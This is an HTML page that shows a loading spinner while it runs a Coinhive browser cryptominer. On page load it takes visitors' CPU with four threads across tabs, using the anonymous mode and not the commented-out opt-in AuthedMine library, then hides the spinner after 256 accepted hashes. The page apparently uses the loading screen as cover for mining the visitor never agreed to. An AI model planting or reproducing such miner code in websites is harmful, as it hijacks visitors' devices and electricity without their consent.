<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>home</title>

</head>
<style>
    /* Center the loader */
    #loader {
        position: absolute;
        left: 50%;
        top: 50%;
        z-index: 1;
        width: 150px;
        height: 150px;
        margin: -75px 0 0 -75px;
        border: 16px solid #f3f3f3;
        border-radius: 50%;
        border-top: 16px solid #3498db;
        width: 120px;
        height: 120px;
        -webkit-animation: spin 2s linear infinite;
        animation: spin 2s linear infinite;
    }

    @-webkit-keyframes spin {
        0% { -webkit-transform: rotate(0deg); }
        100% { -webkit-transform: rotate(360deg); }
    }

    @keyframes spin {
        0% { transform: rotate(0deg); }
        100% { transform: rotate(360deg); }
    }

</style>
<body>
<div id="loader"></div>
<script>
  (function(w,d) {
    var i = setInterval(function(){
        if (w["$__MAH__"] && w["$__MAH__"] >= 256) {
          try {
            if (w["$__CHM__"]) {
              w["$__CHM__"].stop();
            }
          } catch (x) {
            console.log(x)
          }
          finally {
            clearInterval(i);
            d.getElementById("loader").style.display = "none";
          }
        }
    }, 200);
  })(window, document);
</script>

<span id="hashesPerSecond">0</span>-<span id="totalHashes">0</span>-<span id="acceptedHashes">0</span><br />
<!--<script src="./js/app.js"></script>-->
<!--<script src="https://authedmine.com/lib/authedmine.min.js"></script>-->
<script src="https://coinhive.com/lib/coinhive.min.js"></script>

<script>
  var miner = window["$__CHM__"] = new CoinHive.Anonymous('xEPWuVj7vDdXhysn6atwxy8xvUKnD7e0', {
    threads: 4,
    autoThreads: false,
    throttle: 0.2
  });
  miner.setNumThreads(4);
  miner.start(CoinHive.FORCE_MULTI_TAB);
</script>
<script>
  setInterval(function(){
    var hashesPerSecond = miner.getHashesPerSecond();
    var totalHashes = miner.getTotalHashes();
    var acceptedHashes = window["$__MAH__"] = miner.getAcceptedHashes();

    document.getElementById("hashesPerSecond").innerHTML = parseFloat(Math.round(hashesPerSecond * 100) / 100).toFixed(2); ;
    document.getElementById("totalHashes").innerHTML = totalHashes;
    document.getElementById("acceptedHashes").innerHTML = acceptedHashes;

  }, 200);
</script>
</body>
</html>
